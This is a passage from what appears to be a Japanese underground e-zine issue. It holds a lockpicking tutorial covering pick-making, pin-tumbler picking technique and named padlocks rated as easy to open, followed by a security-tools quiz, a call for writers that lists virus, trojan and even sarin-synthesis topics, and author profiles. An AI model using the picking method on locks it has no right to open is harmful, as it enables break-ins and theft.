　ヘアピンはピックツールを作るのにとても有効な材料です。強度には少し問題
がありますが、十分使用に耐えられるレベルです。もともと形ができてますので、
後は少し曲げるだけです。ただし、フックピックしか作れません。
　できるだけ薄っぺらいヘアピンを用意し、ゆっくりと真っ直ぐにします。先端
を少し曲げて完成です。ゆっくり曲げないとすぐに折れてしまいますから注意し
てください。同じようにしてテンションも製作します。

●バーベキューの串

　適度なやわらかさがあり、加工はしやすい材料です。ステンレス用のヤスリを
ホームセンターで購入してください。できれば万力も購入してください。
　次に、100円ショップで一番小さいバーべキュー用の串を買ってください。後は
作りたいピックの形に加工してください。テンションを作るとき、先端を曲げな
ければなりません。その際は、ゆっくりと慎重に作業を行ってください。

●電動工具のジグソー、のこぎりの刃、焼入れ済み鉄板

　これらは焼きが入っているため硬く、加工には難航しますが出来上がったピッ
クの使いやすさは及第点です。ただし、テンションの製作はできません。
　これらの加工にはダイヤモンドヤスリが必需です。また万力も必要ですのであ
わせてホームセンターで購入するのが望ましいです。焼入れ済み鉄板は東急ハン
ズに売ってます。削るときはゆっくりと削るようにしてください、焼きが入って
いるために乱暴に削るとすぐに欠けてしまいます。

●ステンレス板

　ホームセンターで0.5～1mm程度のものを購入してください。ステンレス用ヤス
リ、万力、金ノコもあわせて購入してください。テンションを作るとき、先端を
曲げなければなりませんが、ゆっくり行ってください。


■0x05.) ピンタンブラー錠のピッキングについて

　ピンタンブラー錠の特徴としてピンがあることは以前に説明しましたがこのピ
ンには鍵穴から見えるボトムピンと、シリンダーと外殻にまたがって存在するト
ップピンとがあります。このトップピンがシリンダーの回転を邪魔しているため
に勝手にシリンダーが回転するのを防いでいます。ピッキングはこのトップピン
を全てシリンダーの上に押し上げてシリンダーを回転させることを目的としてい
ます。

参照→http://wizardbible.org/7/image/picture_7.GIF

　しかし、通常トップピンの上にはスプリングがあり、ただ上に押し上げただけ
ではピンが落ちてきて全てのピンを押し上げることはできません。

　そこで、以下のような特殊な方法を使い、ピンを落ちてこないようにします。


■0x06.) ズレをつくる 

　シリンダーと外殻の間にズレをつくり、そのズレにトップピンを引っかけるこ
とでピンを押し上げたままにします。

　まず、鍵穴にテンションを差し込んで時計回りに力をかけてみてください。こ
のままではシリンダーは回転しませんが微妙なズレができたと思います。

参照→http://wizardbible.org/7/image/picture_8.GIF

　このズレが大切です。あまり大きな力は必要ありません、むしろ強すぎる力は
失敗の元です。この力量を保持したままピッキングを行ないます。途中で力を抜
いたりしないでください。


■0x07.) ピンを押し上げる 

　次にピックを鍵穴の奥に差し込んでください。一番奥のピンを押し上げてみま
しょう。押し上げていくと"カチッ"っといった感覚があると思います。これはト
ップピンがシリンダーと外殻の間のズレに引っ掛かったからです。後は同じよう
に奥のピンから順に押し上げていきます。

参照→http://wizardbible.org/7/image/picture_9.GIF


■0x08.) うまくいかない場合 

　もしピンが全く動かない場合は、テンションのかけすぎです。もう少し力を緩
めてください。ピンを押し上げても"カチッ"という感覚がなく、ピンが落ちてき
てしまう場合はテンションが弱すぎます。もう少し力をかけてください。ピッキ
ングはこのテンションのかけぐあいが重要です。テンションが大事だという理由
はここにあります。

　逆にピンの押し上げすぎにも注意してください。押し上げすぎてボトムピンま
でもが外殻に挟まってしまった場合このボトムピンがシリンダーの回転を邪魔す
るので鍵を開けることはできません。

参照→http://wizardbible.org/7/image/picture_10.GIF

　このような状況に陥った場合、テンションをゆるめて一度ピン全部を落として
初めからやり直すしかありません。この症状の原因として挙げられるものはテン
ションのかけすぎとピンの押し上げすぎです。特にテンションのかけすぎは影響
が大きいようです。


■0x09.) ちょっとしたコツ 

　ここでは南京錠の場合のコツ（コツと言うほどのものではありませんが）を紹
介したいと思います。
　南京錠はメーカーや種類によってピッキングのしやすさに大きな差があります。
これを見極めることが大切です。有名な一部のメーカーの開け易さを以下に記述
します。

●BUS　№2000-30m/m 

　そんなに難しい錠ではありません。特に新しいものはレーキングでも簡単に開
けることができます。鍵穴の鍵に収まる突起が左に付いていてテンションをかけ
やすい。

●Keep moving　№1800-30mm

　2つ入りでとても安価。ピンは2つしかなく、とんでもなく簡単に開錠できます。

●ALPHA　№950-30m/m

　とても難しい錠です。突起は左ですが、私はいまだに開けたことがありません。

●HIT　№330-30m/m

　簡単に開きます。

●mola MARK LOCK　№2300-30m/m

　簡単です。突起は左についており、錠のサイズのわりに鍵穴が大きい。

●BIG　№1200-30m/m

　これもそう難しくはありません。突起は左についています。鍵穴が小さいので
薄いピックを使いましょう。


■0x10.) 最後に

　ピッキングをやってみてどうだったでしょうか。思ったより簡単に開く錠の多
さに驚いておられるかもしれませんね。弱点を知って初めて安全性は強化されて
いきます。このテキストを参考にセキュリティーを高めてもらえれば幸いです。



x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x
x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x

--- 第４章: セキュリティツール基礎問題 ---

著者：IPUSIRON

x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x
x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x


■0x01.) はじめに

　『ハッカー認定試験』という本がデータハウスから発売されるようです。

http://www.data-house.co.jp/book/nintei.html

　これにちなんで、Wizard Bibleのネタとして10問の問題を出してみました。総
合的に扱っている前述の本とは異なり、今回載せた問題はあくまでセキュリティ
ツールに関する問題だけにしています。ツールは、本来セキュリティの本質とは
あまり関係ありません。しかしながら、あくまで調査・監査を行う際に知ってお
くと便利だと思います。よって、ツールだから厨房というようなパブロフの犬の
ような反応は止めにして、とりあえず挑戦してみてください。

　今月の問題の解答・解説は来月のWizard Bibleに載せる予定です。
　もし分からない問題があったとしても、いずれもWebや本で調べればすぐ分かる
問題ばかりだと思います。来月まで待てない人は各々で調べてみるとよいでしょ
う。

■0x01.) 問題文

●第１問

　OSを識別するテクニックとして正しくないものを選べ。

（１）アプリケーションバナーからOSを推測する
（２）nmap利用によるOS推測
（３）ettercap利用によるOS推測
（４）Ethereal利用によるOS推測
（５）Cain利用によるOS推測
（６）Queso利用によるOS推測
（７）Cheops利用によるOS推測

●第２問

　スニファーの存在を検知するツールとして正しくないものを選べ。

（１）ifstatus
（２）CPM
（３）AntiSniff
（４）PromiscDetect
（５）Sniffer Detector
（６）chrootkit
（７）Sniff Killer
（８）NEPED

●第３問

　脆弱性の評価、修正プログラムの適応状況をチェックするMSが提供しているフ
リーかつGUIのツールとして、MBSA（Microsoft Baseline Security Analyzer）が
存在する。このMBSAのチェック対象として適切ではないものを選べ。

（１）Windowsの脆弱性
（２）サービスのチェック
（３）パスワードの脆弱性
（４）IISの脆弱性
（５）SQLの脆弱性
（６）修正プログラムのチェック

●第４問

　WindowsNT修復ディスクユーティリティである【　　】を/sオプションをつけて
実行することで、主要なシステム構成情報のバックアップを作成することができ
る。

（１）rdisk.exe
（２）format.exe
（３）sysedit.exe
（４）wowexec.exe

●第５問

　WindowsNTリソースキットに含まれるPDCを調べるプログラムは何か。

（１）scopy.exe
（２）delprof.exe
（３）timeserv.exe
（４）nltest.exe

●第６問

　バッファオーバーフロー対策とは関係ない事柄を選べ。

（１）libsafe
（２）Exec Shield
（３）StackGuard
（４）Flow Shield
（５）PointGuard

●第７問

　Windows Updateサイトでインストール履歴を確認することで、今までインスト
ールした修正プログラムを調べることができる。しかし、何が足りないかはわか
らない。この足りない修正プログラムを調べるプログラムを選べ。

（１）regedit32.exe
（２）svchost.exe
（３）spoolsv.exe
（４）HFNetChk.exe

●第８問

　nbtstatはNetBIOSが開いているホストに対して利用できるわけだが、このNetB
IOSが開いているホストを探さなくてはならない。わざわざ一つずつ試していくの
ではいくら時間があっても足りない。そのときに使用するのに適していないツー
ルを次の選択肢から選べ。

（１）NetBIOS Cracker
（２）nbtscan
（３）enum
（４）Essential NetTools
（５）LanScanner

●第９問

　Linuxにtcpdumpをインストールするときに必要となるライブラリを選べ。

（１）linpcap
（２）libpcap
（３）winpcap
（４）Net::Pcap

●第１０問

　Ethereal使用時、キャプチャしたデータから送信先が192.168.1.10のIPパケッ
トを抜き出すときのディスプレイフィルターのルールを選べ。

（１）ip.addr == 192.168.1.10
（２）ip.src == 192.168.1.10
（３）ip.dst == 192.168.1.10


■0x03.) 最後に

　今回は私が10問作って問題出しましたが、次回のWizard Bibleに自分も問題出
したいという人がいましたら、是非気軽にメールください。もちろんいつも原稿
を送ってくださっている著者の方でも結構です。多数の連絡お待ちしております。

　では、また来月会いましょう。


x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x
x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x

 --- 第５章：お知らせ ---

x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x
x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x


○Wizard Bible（http://2600ch.com/）では随時、執筆ライターを募集していま
す。
　扱う内容のテーマは広義での「under ground」です。例えば、ハッキングから
サリンガスの合成法などと幅広い内容を考えています。また、各種、特殊な職業
や趣味を持った方のレクチャーなども含まれます。
　一回きりでも構いません。また、必ず、毎回連載する義務もありませんのでで
きる範囲で構いません。気軽に声をかけてください。もちろん一回書いたことが
ある人も気軽に声をかけてください（全く気にしていない性格なので）。

　文字数などの規定は特にありませんが、文字数の多いものは、一部編集を加え
て連載とさせていただく場合があります。

　ただし、頂いた原稿の内容で、コンセプトにそぐわないものに関しては掲載さ
れない場合や、原稿の一部を変更したものを掲載する場合がありますのでご了承
ください。

　目標としては、データハウス刊の「危ない28号（現廃刊）」の電脳版といった
ところです。これについてデータハウスの協力により、発刊の可能性もあります。
　また、各ジャンルにおいて、有望な方は単行本執筆の可能性もあるそうです。

　奮ってご応募ください。

○取り扱う具体的な分野は次に示すものです。
・ハッキング（セキュリティネタはこちらに含める）
・クラッキング（ウイルスやトロイの木馬系も含む）
・リバースエンジニアリング（シリアル解析、ゲーム改造、オンラインゲームの
チートを含む）
・コーディング（純粋なプログラミングネタでもクラッキングに近い内容でもよ
い）
・ソーシャルエンジニアリング（開錠技術、侵入技術も含む）
・暗号
・フリーキング（一般電話、携帯電話、公衆電話などの話題や電話システムの話）
・ツール（ツールに特化した話題はこちら）
・ウェアーズ（共有ソフトやエミュレータはこちらに含める）
・ウォッチング（サイトや掲示板のウォッチングネタ）
・ハードクラッキング（自販機、ゲーセンのゲーム機などの怪しい裏技など）

○目標としては、１ヶ月に１回の頻度で発行したいと思っています（予定では毎
月15日に発行）。

○誤植などのお知らせはIPUSIRON宛て（ipusiron@ruffnex.oc.to）にお願いしま
す。

○幅広く初心者から上級者までをターゲット層としたいので、執筆陣に参加した
い方は気軽にメールください。初心者からパワーユーザーまで幅広い層をターゲ
ットにしたいので、マニアックなネタ、読み物系のネタ、初心者向けのネタなど
何でも構いません。オリジナルのネタじゃなくても、読みやすく編集・翻訳した
だけでも十分、一つの記事と言えます。
　別に『Wizard Bible』でチームを組んでいるわけではないので、他のチームに
属している人であっても気にする必要は無いと思います。

　グループやチームに関わらず、自分が興味を持った事柄についてのレポートの
発表の場だと思ってください。

○Wizard Bible（略してWB）の公式サイトは次のURIです。

http://2600ch.com/（一時休止）
http://akademeia.info/wizardbible/（現在はこちらを使ってください）

　過去の記事を閲覧できるようにしてあります。

○支援者、参加希望者用のスレッドを立てました。

http://ruffnex.oc.to/ipusiron/cgi/forum/patio.cgi?mode=view&no=17



x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x
x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x

  ---- 第６章：著者プロフィール ---

x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x
x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x


■Kenji Aiko
●Job: Student
●Web: http://kenjinet.s26.xrea.com/
●Mail: kenjinet@s26.xrea.com
●Team（Group): N/A
●Comment:
　遅れながら、あけましておめでとうございます。今回の記事は hackerslab.org
 の level7-8 で悩んだことを思いだしてかいてみました。知ってる人にとっては
どうってことないものなんですが当時の私はかなり悩みました。結局ある掲示板
である人物にヒントをもらってクリアしたのですが(^^; 
　さてさて、もう21世紀も4年目に突入しましたがいっこうに車が飛ぶ気配があり
ません。はたしてあと100年で本当にどこでもドアが発明されるんでしょうか。タ
イムマシンが発明されるんでしょうか。それよりもクローン人間が大量生産され
て奴隷のようにこきつかわれる、クローンの反乱、世界大戦勃発、地球の最後。
というようなどこかのSF映画みたく黒い未来を想像してしまうんですが。なには
ともあれ長生きはしたいなぁということで2004年は健康第一で行こうかなと（笑）。


■J-Klein
●Job: 旅人
●Web: - Mac Freaks -（http://members.jcom.home.ne.jp/j-klein/）
●Mail: j-klein@jcom.home.ne.jp
●Team（Group）: N/A
●Comment:
　この場を借りて今年の抱負を
1. バイクの免許＆バイク購入
2. GPS を買う
3. 飲み友達を増やす事
4. 酒を減らす事


■Defolos
●Job:Student
●Web:none
●Mail:pan1124@luck.ocn.ne.jp
●Team（Group）:none
●Comment:
　はじめて参加させてもらったDefolosです。IPUSIRONさんにはえらい迷惑をかけ
てしまって申し訳ないです。この場を借りてお詫び申し上げます（編注：こちら
こそ助かりました。文章もWizard Bibleの形式に沿っていて編集しやすかったで
す）。
　ピッキングとナイフメーキング、PCいじりが趣味のごく普通の学生です。
　今後ともどうぞよろしくお願いします。


■IPUSIRON
●Job: 自分でもよく分からない
●Web: http://akademeia.info/（http://akademeia.info/）
●Mail: ipusiron@ruffnex.oc.to
●Team（Group): TeamSA
●Comment:
　新年あけましておめでとうございます（遅）。今年もWizard Bibleをよろしく
お願いします。皆さんで盛り上げていきましょう。目指せ日本のPhrack。目標は
Phrackのリリース数を超えることです。しかし、Phrackはすでにvol.60までいっ
ているので、Wizard Bibleが1ヶ月にvol.1ずつ増えていくならば、単純計算で5年
はかかりますね。さらに、その5年の間にもPhrackもリリースすることでしょうし。
とりあえず、8年後ぐらいにPhrackと並ぶでしょう。そのためにも、多くの読者の
皆様、そして執筆に参加してくださった皆様が必要となります。是非是非長い目
で見守っていただければと思います。

